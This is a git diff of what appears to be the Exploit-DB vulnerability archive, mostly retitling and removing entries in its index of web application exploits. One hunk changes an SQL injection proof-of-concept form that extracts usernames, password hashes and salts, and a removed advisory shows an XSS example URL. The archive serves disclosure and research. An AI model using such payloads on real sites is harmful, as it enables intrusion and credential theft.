5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script (host_id) - SQL Injection",2008-04-28,K-159,php,webapps,0
5520,platforms/php/webapps/5520.txt,"Joovili 3.1 - (browse.videos.php category) SQL Injection",2008-04-28,HaCkeR_EgY,php,webapps,0
5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index - 'cat_id' Parameter SQL Injection",2008-04-28,K-159,php,webapps,0
5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script - 'host_id' Parameter SQL Injection",2008-04-28,K-159,php,webapps,0
5520,platforms/php/webapps/5520.txt,"Joovili 3.1 - 'browse.videos.php' SQL Injection",2008-04-28,HaCkeR_EgY,php,webapps,0
5521,platforms/php/webapps/5521.txt,"SugarCRM Community Edition 4.5.1/5.0.0 - File Disclosure",2008-04-29,"Roberto Suggi Liverani",php,webapps,0
5522,platforms/php/webapps/5522.txt,"LokiCMS 0.3.3 - Arbitrary File Delete",2008-04-29,cOndemned,php,webapps,0
5523,platforms/php/webapps/5523.txt,"Project Based Calendaring System (PBCS) 0.7.1 - Multiple Vulnerabilities",2008-04-30,GoLd_M,php,webapps,0
@ -18992,7 +18995,7 @@ id,file,description,date,author,platform,type,port
5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 - (Parameters.php) Remote File Inclusion",2008-06-26,Ciph3r,php,webapps,0
5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (2)",2008-06-26,StAkeR,php,webapps,0
5957,platforms/php/webapps/5957.txt,"OTManager CMS 24a - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-27,"CWH Underground",php,webapps,0
5958,platforms/php/webapps/5958.txt,"w1l3d4 philboard 1.2 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-27,Bl@ckbe@rD,php,webapps,0
5958,platforms/php/webapps/5958.txt,"W1L3D4 philboard 1.2 - Blind SQL Injection / Cross-Site Scripting",2008-06-27,Bl@ckbe@rD,php,webapps,0
5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 - Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps,0
5960,platforms/php/webapps/5960.txt,"SePortal 2.4 - (poll.php poll_id) SQL Injection",2008-06-27,Mr.SQL,php,webapps,0
5961,platforms/php/webapps/5961.txt,"PHP-Fusion Mod Classifieds - 'lid' Parameter SQL Injection",2008-06-27,boom3rang,php,webapps,0
@ -19733,7 +19736,7 @@ id,file,description,date,author,platform,type,port
6953,platforms/php/webapps/6953.txt,"Maran PHP Shop - 'prod.php cat' SQL Injection",2008-11-02,JosS,php,webapps,0
6954,platforms/php/webapps/6954.txt,"Maran PHP Shop - 'admin.php' Insecure Cookie Handling",2008-11-02,JosS,php,webapps,0
6955,platforms/php/webapps/6955.txt,"Joovili 3.1.4 - Insecure Cookie Handling",2008-11-02,ZoRLu,php,webapps,0
6956,platforms/php/webapps/6956.txt,"apartment search script - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-02,ZoRLu,php,webapps,0
6956,platforms/php/webapps/6956.txt,"Apartment Search Script - Arbitrary File Upload / Cross-Site Scripting",2008-11-02,ZoRLu,php,webapps,0
6957,platforms/php/webapps/6957.txt,"NetRisk 2.0 - Cross-Site Scripting / SQL Injection",2008-11-02,StAkeR,php,webapps,0
6958,platforms/php/webapps/6958.txt,"Maran PHP Shop - 'prodshow.php' SQL Injection",2008-11-02,d3v1l,php,webapps,0
6960,platforms/php/webapps/6960.txt,"1st News - 'products.php id' SQL Injection",2008-11-02,TR-ShaRk,php,webapps,0
@ -19819,7 +19822,7 @@ id,file,description,date,author,platform,type,port
7046,platforms/php/webapps/7046.txt,"MyioSoft EasyCalendar - (Authentication Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0
7047,platforms/php/webapps/7047.txt,"DELTAScripts PHP Classifieds 7.5 - SQL Injection",2008-11-07,ZoRLu,php,webapps,0
7048,platforms/php/webapps/7048.txt,"E-topbiz Online Store 1 - 'cat_id' SQL Injection",2008-11-07,Stack,php,webapps,0
7049,platforms/php/webapps/7049.txt,"Mini Web Calendar 1.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-07,ahmadbady,php,webapps,0
7049,platforms/php/webapps/7049.txt,"Mini Web Calendar 1.2 - File Disclosure / Cross-Site Scripting",2008-11-07,ahmadbady,php,webapps,0
7050,platforms/php/webapps/7050.txt,"E-topbiz Number Links 1 - 'id' SQL Injection",2008-11-07,"Hussin X",php,webapps,0
7052,platforms/php/webapps/7052.txt,"Domain Seller Pro 1.5 - 'id' SQL Injection",2008-11-07,TR-ShaRk,php,webapps,0
7053,platforms/php/webapps/7053.txt,"Myiosoft EasyBookMarker 4 - (Parent) SQL Injection",2008-11-07,G4N0K,php,webapps,0
@ -19926,7 +19929,7 @@ id,file,description,date,author,platform,type,port
7189,platforms/php/webapps/7189.txt,"getaphpsite Auto Dealers - Arbitrary File Upload",2008-11-22,ZoRLu,php,webapps,0
7190,platforms/php/webapps/7190.txt,"Ez Ringtone Manager - Multiple Remote File Disclosure Vulnerabilities",2008-11-22,b3hz4d,php,webapps,0
7191,platforms/php/webapps/7191.php,"LoveCMS 1.6.2 Final (Simple Forum 3.1d) - Change Admin Password",2008-11-22,cOndemned,php,webapps,0
7195,platforms/php/webapps/7195.txt,"Prozilla Hosting Index - 'id' SQL Injection",2008-11-23,snakespc,php,webapps,0
7195,platforms/php/webapps/7195.txt,"Prozilla Hosting Index - 'id' Parameter SQL Injection",2008-11-23,snakespc,php,webapps,0
7197,platforms/php/webapps/7197.txt,"Goople CMS 1.7 - Arbitrary File Upload",2008-11-23,x0r,php,webapps,0
7198,platforms/php/webapps/7198.txt,"Netartmedia Cars Portal 2.0 - (image.php id) SQL Injection",2008-11-23,snakespc,php,webapps,0
7199,platforms/php/webapps/7199.txt,"Netartmedia Blog System - 'image.php id' SQL Injection",2008-11-23,snakespc,php,webapps,0
@ -19965,7 +19968,7 @@ id,file,description,date,author,platform,type,port
7239,platforms/php/webapps/7239.txt,"ParsBlogger - 'blog.asp wr' SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0
7240,platforms/php/webapps/7240.txt,"Star Articles 6.0 - Blind SQL Injection (1)",2008-11-26,b3hz4d,php,webapps,0
7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - (index.php m) Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0
7242,platforms/php/webapps/7242.txt,"web Calendar system 3.12/3.30 - Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0
7242,platforms/php/webapps/7242.txt,"Web Calendar System 3.12/3.30 - Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0
7243,platforms/php/webapps/7243.php,"Star Articles 6.0 - Blind SQL Injection (2)",2008-11-27,Stack,php,webapps,0
7244,platforms/php/webapps/7244.txt,"Ocean12 Contact Manager Pro - (SQL Injection / Cross-Site Scripting / File Disclosure) Multiple Vulnerabilities",2008-11-27,Pouya_Server,php,webapps,0
7245,platforms/php/webapps/7245.txt,"Ocean12 Membership Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0
@ -19974,7 +19977,7 @@ id,file,description,date,author,platform,type,port
7248,platforms/php/webapps/7248.txt,"Family Project 2.x - (Authentication Bypass) SQL Injection",2008-11-27,The_5p3ctrum,php,webapps,0
7250,platforms/php/webapps/7250.txt,"RakhiSoftware Shopping Cart - (subcategory_id) SQL Injection",2008-11-27,XaDoS,php,webapps,0
7251,platforms/php/webapps/7251.txt,"Star Articles 6.0 - Arbitrary File Upload",2008-11-27,ZoRLu,php,webapps,0
7252,platforms/php/webapps/7252.txt,"Web Calendar 4.1 - (Authentication Bypass) SQL Injection",2008-11-27,Cyber-Zone,php,webapps,0
7252,platforms/php/webapps/7252.txt,"Web Calendar 4.1 - Authentication Bypass",2008-11-27,Cyber-Zone,php,webapps,0
7253,platforms/php/webapps/7253.txt,"Booking Centre 2.01 - (HotelID) SQL Injection",2008-11-27,R3d-D3V!L,php,webapps,0
7254,platforms/php/webapps/7254.txt,"Ocean12 Membership Manager Pro - (Authentication Bypass) SQL Injection",2008-11-27,Cyber-Zone,php,webapps,0
7255,platforms/php/webapps/7255.txt,"pagetree CMS 0.0.2 Beta 0001 - Remote File Inclusion",2008-11-27,NoGe,php,webapps,0
@ -19984,7 +19987,7 @@ id,file,description,date,author,platform,type,port
7260,platforms/php/webapps/7260.txt,"Basic-CMS - 'acm2000.mdb' Remote Database Disclosure",2008-11-28,Stack,php,webapps,0
7261,platforms/php/webapps/7261.txt,"Basic-CMS - 'index.php id' Blind SQL Injection",2008-11-28,"CWH Underground",php,webapps,0
7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 - (Authentication Bypass) SQL Injection",2008-11-28,MrDoug,php,webapps,0
7265,platforms/php/webapps/7265.txt,"web Calendar system 3.40 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-11-28,Bl@ckbe@rD,php,webapps,0
7265,platforms/php/webapps/7265.txt,"Web Calendar System 3.40 - Cross-Site Scripting / SQL Injection",2008-11-28,Bl@ckbe@rD,php,webapps,0
7266,platforms/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote Database Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0
7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a - (Authentication Bypass) SQL Injection",2008-11-28,JIKO,php,webapps,0
7268,platforms/php/webapps/7268.txt,"Bluo CMS 1.2 - (index.php id) Blind SQL Injection",2008-11-28,The_5p3ctrum,php,webapps,0
@ -23356,7 +23359,7 @@ id,file,description,date,author,platform,type,port
13927,platforms/php/webapps/13927.txt,"MarketSaz - Arbitrary File Upload",2010-06-18,NetQurd,php,webapps,0
13929,platforms/php/webapps/13929.txt,"Banner Management Script - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
13930,platforms/php/webapps/13930.txt,"Shopping Cart Script with Affiliate Program - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
13931,platforms/php/webapps/13931.txt,"KubeLance - 'profile.php?id' SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
13931,platforms/php/webapps/13931.txt,"KubeLance 1.7.6 - 'profile.php' SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
13933,platforms/php/webapps/13933.txt,"UK One Media CMS - 'id' Error-Based SQL Injection",2010-06-19,LiquidWorm,php,webapps,0
13935,platforms/php/webapps/13935.txt,"Joomla! Component 'RSComments' 1.0.0 - Persistent Cross-Site Scripting",2010-06-19,jdc,php,webapps,0
13936,platforms/php/webapps/13936.txt,"Elite Gaming Ladders 3.5 - SQL Injection (ladder[id])",2010-06-19,ahwak2000,php,webapps,0
@ -27809,7 +27812,7 @@ id,file,description,date,author,platform,type,port
25983,platforms/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 - User.cfm Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0
25984,platforms/cfm/webapps/25984.txt,"Simple Message Board 2.0 beta1 - Thread.cfm Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0
25985,platforms/cfm/webapps/25985.txt,"Simple Message Board 2.0 beta1 - Search.cfm Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0
25990,platforms/php/webapps/25990.txt,"Clever Copy 2.0 - calendar.php Cross-Site Scripting",2005-07-15,Lostmon,php,webapps,0
25990,platforms/php/webapps/25990.txt,"Clever Copy 2.0 - 'calendar.php' Cross-Site Scripting",2005-07-15,Lostmon,php,webapps,0
25994,platforms/php/webapps/25994.txt,"osCommerce 2.2 - update.php Information Disclosure",2005-07-18,"Andrew Hunter",php,webapps,0
25995,platforms/php/webapps/25995.txt,"e107 Website System 0.6 - Nested BBCode URL Tag Script Injection",2005-07-18,"Nick Griffin",php,webapps,0
25996,platforms/php/webapps/25996.txt,"Ruubikcms 1.1.1 - Persistent Cross-Site Scripting",2013-06-07,expl0i13r,php,webapps,0
@ -27841,8 +27844,8 @@ id,file,description,date,author,platform,type,port
26033,platforms/asp/webapps/26033.txt,"CartWIZ 1.10/1.20 - viewcart.asp Cross-Site Scripting",2005-07-26,Zinho,asp,webapps,0
26034,platforms/php/webapps/26034.txt,"NETonE PHPBook 1.4.6 - Guestbook.php Cross-Site Scripting",2005-07-26,rgod,php,webapps,0
26036,platforms/php/webapps/26036.txt,"PNG Counter 1.0 - Demo.php Cross-Site Scripting",2005-07-26,ArCaX-ATH,php,webapps,0
26037,platforms/php/webapps/26037.txt,"Clever Copy 2.0 - results.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26038,platforms/php/webapps/26038.txt,"Clever Copy 2.0 - categorysearch.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26037,platforms/php/webapps/26037.txt,"Clever Copy 2.0 - 'results.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26038,platforms/php/webapps/26038.txt,"Clever Copy 2.0 - 'categorysearch.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26039,platforms/php/webapps/26039.txt,"BMForum 3.0 - topic.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26040,platforms/php/webapps/26040.txt,"BMForum 3.0 - forums.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
26041,platforms/php/webapps/26041.txt,"BMForum 3.0 - post.php forumid Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
@ -28496,8 +28499,8 @@ id,file,description,date,author,platform,type,port
26870,platforms/php/webapps/26870.txt,"Advanced Guestbook 2.x - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,Handrix,php,webapps,0
26871,platforms/php/webapps/26871.txt,"PlaySms - 'index.php' Cross-Site Scripting",2005-12-19,mohajali2k4,php,webapps,0
26872,platforms/php/webapps/26872.txt,"PHP-Fusion 6.0 - 'members.php' Cross-Site Scripting",2005-12-19,krasza,php,webapps,0
26873,platforms/asp/webapps/26873.txt,"Acidcat CMS 2.1.13 - default.asp ID Parameter SQL Injection",2005-12-19,admin@hamid.ir,asp,webapps,0
26874,platforms/asp/webapps/26874.txt,"Acidcat CMS 2.1.13 - acidcat.mdb Remote Information Disclosure",2005-12-19,admin@hamid.ir,asp,webapps,0
26873,platforms/asp/webapps/26873.txt,"Acidcat CMS 2.1.13 - 'ID' Parameter SQL Injection",2005-12-19,admin@hamid.ir,asp,webapps,0
26874,platforms/asp/webapps/26874.txt,"Acidcat CMS 2.1.13 - 'acidcat.mdb' Remote Information Disclosure",2005-12-19,admin@hamid.ir,asp,webapps,0
26875,platforms/asp/webapps/26875.txt,"allinta CMS 2.3.2 - faq.asp s Parameter Cross-Site Scripting",2005-12-19,r0t3d3Vil,asp,webapps,0
26876,platforms/asp/webapps/26876.txt,"allinta CMS 2.3.2 - search.asp searchQuery Parameter Cross-Site Scripting",2005-12-19,r0t3d3Vil,asp,webapps,0
26877,platforms/php/webapps/26877.txt,"Box UK Amaxus CMS 3.0 - Cross-Site Scripting",2005-12-19,r0t3d3Vil,php,webapps,0
@ -28516,7 +28519,7 @@ id,file,description,date,author,platform,type,port
26895,platforms/php/webapps/26895.txt,"Magnolia Search Module 2.1 - Cross-Site Scripting",2005-12-19,r0t3d3Vil,php,webapps,0
26896,platforms/php/webapps/26896.txt,"ContentServ 3.0/3.1/4.0 - 'index.php' SQL Injection",2005-12-19,r0t,php,webapps,0
26897,platforms/php/webapps/26897.txt,"Direct News 4.9 - 'index.php' SQL Injection",2005-12-19,r0t,php,webapps,0
26898,platforms/php/webapps/26898.txt,"ODFaq 2.1 - faq.php SQL Injection",2005-12-19,r0t,php,webapps,0
26898,platforms/php/webapps/26898.txt,"ODFaq 2.1 - 'faq.php' SQL Injection",2005-12-19,r0t,php,webapps,0
26899,platforms/php/webapps/26899.txt,"Marwel 2.7 - 'index.php' SQL Injection",2005-12-19,r0t,php,webapps,0
26900,platforms/php/webapps/26900.txt,"Miraserver 1.0 RC4 - 'index.php' page Parameter SQL Injection",2005-12-19,r0t,php,webapps,0
26901,platforms/php/webapps/26901.txt,"Miraserver 1.0 RC4 - newsitem.php id Parameter SQL Injection",2005-12-19,r0t,php,webapps,0
@ -29507,7 +29510,7 @@ id,file,description,date,author,platform,type,port
28248,platforms/php/webapps/28248.txt,"IDevSpot PHPHostBot 1.0 - 'index.php' Remote File Inclusion",2006-07-20,r0t,php,webapps,0
28249,platforms/php/webapps/28249.txt,"GeoAuctions 1.0.6 Enterprise - 'index.php' d Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0
28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products - 'index.php' b Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0
28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 - news.php Remote File Inclusion",2006-07-20,AG-Spider,php,webapps,0
28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 - 'news.php' Remote File Inclusion",2006-07-20,AG-Spider,php,webapps,0
28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 - common.inc.php Remote File Inclusion",2006-07-21,Solpot,php,webapps,0
28255,platforms/php/webapps/28255.txt,"Chameleon LE 1.203 - 'index.php' Directory Traversal",2006-07-21,kicktd,php,webapps,0
28260,platforms/php/webapps/28260.txt,"Lussumo Vanilla 1.0 - RootDirectory Remote File Inclusion",2006-07-24,MFox,php,webapps,0
@ -30934,7 +30937,7 @@ id,file,description,date,author,platform,type,port
30331,platforms/asp/webapps/30331.html,"ASP cvmatik 1.1 - Multiple HTML Injection Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0
30332,platforms/asp/webapps/30332.txt,"Image Racer - searchresults.asp SQL Injection",2007-07-23,"Aria-Security Team",asp,webapps,0
30333,platforms/php/webapps/30333.txt,"PHMe 0.0.2 - Function_List.php Local File Inclusion",2007-07-23,You_You,php,webapps,0
30382,platforms/asp/webapps/30382.txt,"W1L3D4 philboard 0.3 - W1L3D4_Aramasonuc.asp Cross-Site Scripting",2007-07-25,GeFORC3,asp,webapps,0
30382,platforms/asp/webapps/30382.txt,"W1L3D4 philboard 0.3 - Cross-Site Scripting",2007-07-25,GeFORC3,asp,webapps,0
30378,platforms/php/webapps/30378.txt,"Webbler CMS 3.1.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-07-24,"Adrian Pastor",php,webapps,0
30379,platforms/php/webapps/30379.html,"Webbler CMS 3.1.3 - Mail A Friend Open Email Relay",2007-07-24,"Adrian Pastor",php,webapps,0
30380,platforms/php/webapps/30380.txt,"CPanel 10.9.1 - Resname Parameter Cross-Site Scripting",2007-07-24,"Aria-Security Team",php,webapps,0
@ -30997,7 +31000,7 @@ id,file,description,date,author,platform,type,port
30453,platforms/php/webapps/30453.txt,"snif 1.5.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-08-06,r0t,php,webapps,0
30456,platforms/php/webapps/30456.txt,"VietPHP - _functions.php dirpath Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0
30457,platforms/php/webapps/30457.txt,"VietPHP - admin/index.php language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0
30810,platforms/php/webapps/30810.txt,"Proverbs Web Calendar 1.1 - Password Parameter SQL Injection",2007-11-26,JosS,php,webapps,0
30810,platforms/php/webapps/30810.txt,"Proverbs Web Calendar 1.1 - 'Password' Parameter SQL Injection",2007-11-26,JosS,php,webapps,0
30459,platforms/php/webapps/30459.txt,"VietPHP - 'index.php' language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0
30463,platforms/php/webapps/30463.txt,"Coppermine Photo Gallery 1.3/1.4 - YABBSE.INC.php Remote File Inclusion",2007-08-08,Ma$tEr-0F-De$a$t0r,php,webapps,0
30900,platforms/hardware/webapps/30900.html,"Feixun Wireless Router FWR-604H - Remote Code Execution",2014-01-14,"Arash Abedian",hardware,webapps,80
@ -31794,7 +31797,6 @@ id,file,description,date,author,platform,type,port
31672,platforms/php/webapps/31672.txt,"uTorrent WebUI 0.310 Beta 2 - Cross-Site Request Forgery",2008-04-18,th3.r00k,php,webapps,0
31673,platforms/multiple/webapps/31673.txt,"Azureus HTML WebUI 0.7.6 - Cross-Site Request Forgery",2008-04-18,th3.r00k,multiple,webapps,0
31674,platforms/php/webapps/31674.txt,"XOOPS Recette 2.2 - 'detail.php' SQL Injection",2008-04-19,S@BUN,php,webapps,0
31675,platforms/php/webapps/31675.txt,"Chimaera Project Aterr 0.9.1 - Multiple Local File Inclusion",2008-04-19,KnocKout,php,webapps,0
31676,platforms/php/webapps/31676.txt,"Host Directory PRO - Cookie Security Bypass",2008-04-20,Crackers_Child,php,webapps,0
31677,platforms/php/webapps/31677.txt,"Advanced Electron Forum 1.0.6 - 'beg' Parameter Cross-Site Scripting",2008-04-21,ZoRLu,php,webapps,0
31678,platforms/php/webapps/31678.txt,"SMF 1.1.4 - Audio CAPTCHA Security Bypass",2008-04-21,"Michael Brooks",php,webapps,0
@ -31813,7 +31815,6 @@ id,file,description,date,author,platform,type,port
31705,platforms/php/webapps/31705.txt,"PHCDownload 1.1 - upload/install/index.php step Parameter Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0
31708,platforms/php/webapps/31708.txt,"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion",2008-04-26,NoGe,php,webapps,0
31709,platforms/php/webapps/31709.txt,"Siteman 2.0.x2 - 'module' Parameter Cross-Site Scripting / Local File Inclusion",2008-04-26,"Khashayar Fereidani",php,webapps,0
31712,platforms/php/webapps/31712.txt,"miniBB 2.2 - 'bb_admin.php' Cross-Site Scripting",2008-04-28,"Khashayar Fereidani",php,webapps,0
31716,platforms/php/webapps/31716.txt,"VWar 1.6.1 R2 - Multiple Remote Vulnerabilities",2008-05-01,"Darren McDonald",php,webapps,0
31717,platforms/php/webapps/31717.txt,"MJGUEST 6.7 - QT 'mjguest.php' Cross-Site Scripting",2008-05-01,"Khashayar Fereidani",php,webapps,0
31719,platforms/php/webapps/31719.pl,"KnowledgeQuest 2.6 - Administration Multiple Authentication Bypass Vulnerabilities",2008-05-02,Cod3rZ,php,webapps,0
@ -32096,7 +32097,7 @@ id,file,description,date,author,platform,type,port
32120,platforms/asp/webapps/32120.txt,"Web Wiz Forum 9.5 - admin_category_details.asp mode Parameter Cross-Site Scripting",2008-07-28,CSDT,asp,webapps,0
32121,platforms/php/webapps/32121.php,"Jamroom 3.3.8 - (Cookie Authentication Bypass and Unspecified Security Issues) Multiple Vulnerabilities",2008-07-28,"James Bercegay",php,webapps,0
32122,platforms/php/webapps/32122.txt,"Owl Intranet Engine 0.95 - 'register.php' Cross-Site Scripting",2008-07-28,"Fabian Fingerle",php,webapps,0
32123,platforms/php/webapps/32123.txt,"miniBB RSS 2.0 Plugin - Multiple Remote File Inclusion",2008-07-29,"Ghost Hacker",php,webapps,0
32123,platforms/php/webapps/32123.txt,"MiniBB RSS 2.0 Plugin - Multiple Remote File Inclusion",2008-07-29,"Ghost Hacker",php,webapps,0
32126,platforms/php/webapps/32126.txt,"ScrewTurn Software ScrewTurn Wiki 2.0.x - 'System Log' Page HTML Injection",2008-05-11,Portcullis,php,webapps,0
32128,platforms/php/webapps/32128.txt,"MJGUEST 6.8 - 'Guestbook.js.php' Cross-Site Scripting",2008-07-30,DSecRG,php,webapps,0
32130,platforms/php/webapps/32130.txt,"DEV Web Management System 1.5 - Multiple Input Validation Vulnerabilities",2008-07-30,Dr.Crash,php,webapps,0
@ -32834,7 +32835,6 @@ id,file,description,date,author,platform,type,port
33474,platforms/php/webapps/33474.txt,"Joomla! Component DM Orders - 'id' Parameter SQL Injection",2010-01-07,NoGe,php,webapps,0
33475,platforms/php/webapps/33475.txt,"dotProject 2.1.3 - Multiple SQL Injections / HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps,0
33478,platforms/php/webapps/33478.txt,"Joomla! Component Jobads - 'type' Parameter SQL Injection",2010-01-08,N0KT4,php,webapps,0
33481,platforms/asp/webapps/33481.txt,"DevWorx BlogWorx 1.0 - 'forum.asp' Cross-Site Scripting",2010-01-09,Cyber_945,asp,webapps,0
33482,platforms/php/webapps/33482.txt,"DigitalHive - 'mt' Parameter Cross-Site Scripting",2010-01-10,ViRuSMaN,php,webapps,0
33484,platforms/php/webapps/33484.txt,"DELTAScripts PHP Links 1.0 - 'email' Parameter Cross-Site Scripting",2010-01-11,Crux,php,webapps,0
33485,platforms/php/webapps/33485.txt,"Jamit Job Board - 'post_id' Parameter Cross-Site Scripting",2010-01-11,Crux,php,webapps,0
@ -33064,7 +33064,6 @@ id,file,description,date,author,platform,type,port
33922,platforms/php/webapps/33922.txt,"CH-CMS.ch 2 - Multiple Arbitrary File Upload Vulnerabilities",2010-03-15,EL-KAHINA,php,webapps,0
33923,platforms/asp/webapps/33923.txt,"SamaGraph CMS - 'inside.aspx' SQL Injection",2010-03-11,K053,asp,webapps,0
33925,platforms/php/webapps/33925.txt,"ecoCMS 18.4.2010 - 'admin.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0
33927,platforms/php/webapps/33927.txt,"eZoneScripts Apartment Search Script - 'listtest.php' SQL Injection",2010-02-09,JIKO,php,webapps,0
33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent Cross-Site Scripting",2014-07-02,Provensec,php,webapps,80
33959,platforms/asp/webapps/33959.txt,"Multiple Consona Products - 'n6plugindestructor.asp' Cross-Site Scripting",2010-05-07,"Ruben Santamarta",asp,webapps,0
33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081
@ -34094,7 +34093,7 @@ id,file,description,date,author,platform,type,port
35576,platforms/asp/webapps/35576.txt,"Omer Portal 3.220060425 - 'arama_islem.asp' Cross-Site Scripting",2011-04-07,"kurdish hackers team",asp,webapps,0
35577,platforms/php/webapps/35577.txt,"vtiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",php,webapps,0
35578,platforms/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion",2014-12-19,Wireghoul,php,webapps,0
35579,platforms/php/webapps/35579.txt,"miniBB 3.1 - Blind SQL Injection",2014-12-19,"Kacper Szurek",php,webapps,80
35579,platforms/php/webapps/35579.txt,"MiniBB 3.1 - Blind SQL Injection",2014-12-19,"Kacper Szurek",php,webapps,80
35582,platforms/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
35583,platforms/php/webapps/35583.txt,"Piwigo 2.7.2 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
35584,platforms/php/webapps/35584.txt,"GQ File Manager 0.2.5 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
@ -36817,3 +36816,4 @@ id,file,description,date,author,platform,type,port
40804,platforms/php/webapps/40804.txt,"Wordpress Plugin Olimometer 2.56 - SQL Injection",2016-11-21,"TAD GROUP",php,webapps,0
40809,platforms/php/webapps/40809.txt,"EasyPHP Devserver 16.1.1 - Cross-Site Request Forgery / Remote Command Execution",2016-11-22,hyp3rlinx,php,webapps,0
40816,platforms/xml/webapps/40816.txt,"SAP NetWeaver AS JAVA - 'BC-BMT-BPM-DSK' XML External Entity Injection",2016-11-22,ERPScan,xml,webapps,0
40826,platforms/php/webapps/40826.py,"Osticket 1.9.14 - 'X-Forwarded-For' Cross-Site Scripting",2016-11-24,"Joaquin Ramirez Martinez",php,webapps,0

Can't render this file because it is too large.

View file

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/37695/info
DevWorx BlogWorx is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
BlogWorx 1.0 is vulnerable; other versions may be affected as well.
http://www.example.com/openforum/forum.asp?fid=12&ofact=1&ofmsgid=227&ofdisp=[XSS-Vuln]

View file

@ -40,7 +40,7 @@ A complete, fully featured ASP website system. Includes an extremely powerful fo
3.1. "/forums/attach-file.asp" SQL Inection POC:
-------------
<form ENCTYPE="multipart/form-data" method="post" action="http://[Site URL]/forums/attach-file.asp?action=postupload&amp;mid=[YOUR MSG ID]&amp;attachmentid=1 or 1=convert(int,(select top 1 username%2bpassword%2bsalt from members where username<>''))">
<form ENCTYPE="multipart/form-data" method="post" action="http://[Site URL]/forums/attach-file.asp?action=postupload&mid=[YOUR MSG ID]&attachmentid=1 or 1=convert(int,(select top 1 username%2bpassword%2bsalt from members where username<>''))">
File : <input type='file' name='attachment' size='40'>
<br />
<input type='submit' value='Submit'>

View file

@ -0,0 +1,331 @@
'''
=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
- CVE-2016-7098
- Release date: 24.11.2016
- Revision 1.0
- Severity: Medium
=============================================
I. VULNERABILITY
-------------------------
GNU Wget < 1.18 Access List Bypass / Race Condition
II. BACKGROUND
-------------------------
"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and
FTP, the most widely-used Internet protocols.
It is a non-interactive commandline tool, so it may easily be called from
scripts, cron jobs, terminals without X-Windows support, etc.
GNU Wget has many features to make retrieving large files or mirroring entire
web or FTP sites easy
"
